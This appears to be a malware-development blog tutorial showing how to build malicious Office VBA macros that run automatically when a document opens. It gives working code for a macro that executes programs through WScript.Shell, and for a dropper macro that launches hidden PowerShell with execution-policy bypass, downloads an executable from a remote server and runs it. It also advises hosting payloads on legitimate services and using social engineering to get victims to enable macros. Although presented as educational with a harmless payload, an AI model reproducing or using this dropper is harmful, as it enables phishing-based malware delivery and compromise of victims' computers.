Malware development trick 48: leveraging Office macros for malware. Simple VBA example.
﷽
Hello, cybersecurity enthusiasts and white hackers!
Today we will consider one of the most interesting tricks in the malware development. Office Macros have long been a reliable tool for attackers looking to deliver payloads, bypass security mechanisms, and execute malicious code. In this post, we’ll explore how attackers can use Office macros to execute system commands and download malicious payloads using simple VBA code.
Macros in Office applications (like Word, Excel, and PowerPoint) are small programs written in Visual Basic for Applications (VBA), a variant of the Visual Basic programming language. These macros can automate repetitive tasks within Office documents and even interact with the system to execute commands, making them ideal for malware delivery.
Unfortunately, because Office macros are so commonly used for legitimate tasks, they have become a prime target for attackers. When an unsuspecting user opens a document with a malicious macro, the attacker’s code is executed, often without the user’s knowledge or consent.
practical example
First of all for create VBA macro, we need to create .doc
document:
Then go to View -> Macros -> View Macros
and set Macros in
:
One of the most basic but effective ways attackers use macros is by executing system commands via the WScript.Shell
object. This allows the macro to run arbitrary programs, potentially leading to system compromise. Let’s break down a simple VBA
macro that executes a system application, in this case, mspaint.exe
:
Sub MeowMacro()
Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("mspaint.exe")
End Sub
Sub AutoOpen()
MeowMacro
End Sub
Sub Document_Open()
MeowMacro
End Sub
First of all, we initialize a new WScript.Shell
object, which is responsible for running system commands:
Set shell_object = CreateObject("WScript.Shell")
Then:
shell_object.Exec ("mspaint.exe")
runs the mspaint.exe
program (Microsoft Paint) when the macro is triggered. This is just an example of a benign application, but attackers can easily replace this with a malicious payload.
The AutoOpen
and Document_Open
subroutines ensure that the macro runs automatically when the document is opened.
demo
Let’s go to see everything in action. Create vba scipt in our meow.doc
document:
and reopen it:
As you can see, we need to enable Macro (you will see the alert about Macro only on .doc
or .docm
extensions). After enable, wait execution:
As you can see, everything is worked perfectly, as expected! =^..^=
In real attacks there are many different social engineering methods that will force your victim to enable macros in Microsoft Office.
What can we do with this technique? The above macro could be used for a range of purposes, from launching benign applications to running malicious ones. More commonly, attackers might launch malicious executables or scripts that could compromise the system further.
practical example 2
In the next example, we’ll take this one step further by combining the macro with PowerShell commands to download and execute a malware. This method bypasses traditional execution policies and uses the WScript.Shell
object to run the PowerShell script.
First of all, we need malware. Let’s say we have a “malware”:
/*
* hack.c
* evil app for windows
* for macro
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2025/07/01/malware-tricks-48.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
return 0;
}
Then, we need downloading this malicious soft:
(New-Object System.Net.WebClient).DownloadFile('http://192.168.56.1:8888/hack.exe', 'C:\temp\hack.exe')
instructs PowerShell to download the malicious file hack.exe
from a remote server http://192.168.56.1:8888/hack.exe
and save it locally on the victim’s machine at C:\temp\hack.exe
.
Finally
Start-Process C:\temp\hack.exe
executes the downloaded malicious file once it has been saved to the victim’s system.
As with the first example, the AutoOpen
and Document_Open
subroutines automatically execute the macro when the document is opened.
Full source code of this VBA looks like this:
Sub MeowMacro()
' PowerShell ignore Execution policy
Dim psScript As String
psScript = "powershell.exe -ExecutionPolicy Bypass -window-style hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.1:8888/hack.exe', 'C:\temp\hack.exe'); Start-Process C:\temp\hack.exe"
' using WScript.Shell for run PowerShell
Dim shell_object As Object
Set shell_object = CreateObject("WScript.Shell")
shell_object.Run psScript, 0, False ' 0 - hidden mode, False - no wait
MsgBox "powershell script executed successfully."
End Sub
Sub AutoOpen()
MeowMacro
End Sub
Sub Document_Open()
MeowMacro
End Sub
So, how it works? When the victim opens the malicious document, the macro is triggered and the PowerShell script is executed.
demo 2
Let’s go to see second example in practice. First of all, compile our malware:
x86_64-w64-mingw32-g++ hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
For checking correctness, try to run it manually in the Windows VM:
.\hack.exe
Then, create meow2.doc
document:
And do the same steps as in the first example for create macros:
As you can see, for simplicity, use local server for hosting my hack.exe
“malware”:
but in real attacks you can abuse something legit.
Then, reopen meow2.doc
and enable macro:
Even if you close Word document, malicious hack.exe
still worked without any crashes:
As you can see, everything is worked as expected! =^..^=
Let’s update this sample to ANY.RUN:
But for real analysis, we need to host our hack.exe
in Github or file hosting, or any legit hosting.
But still this file is recognized as malicious:
https://app.any.run/tasks/5708ac3e-1c7d-42ac-af8f-85e6c5bf7d7e
This simple trick is still used by various APT groups like Sandworm, APT33, APT37 and APT38
I hope this post is useful for malware researchers, C/C++ and VBA programmers, spreads awareness to the blue teamers of this interesting classic leveraging Office macros technique, and adds a weapon to the red teamers arsenal.
Thanks to ANY.RUN for API!
MITRE ATT&CK Techniques: Visual Basic
ANY.RUN
ANY.RUN: meow2.doc
APT33
APT37
APT38
Sandworm
Sandworm: MITRE
source code in Github
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine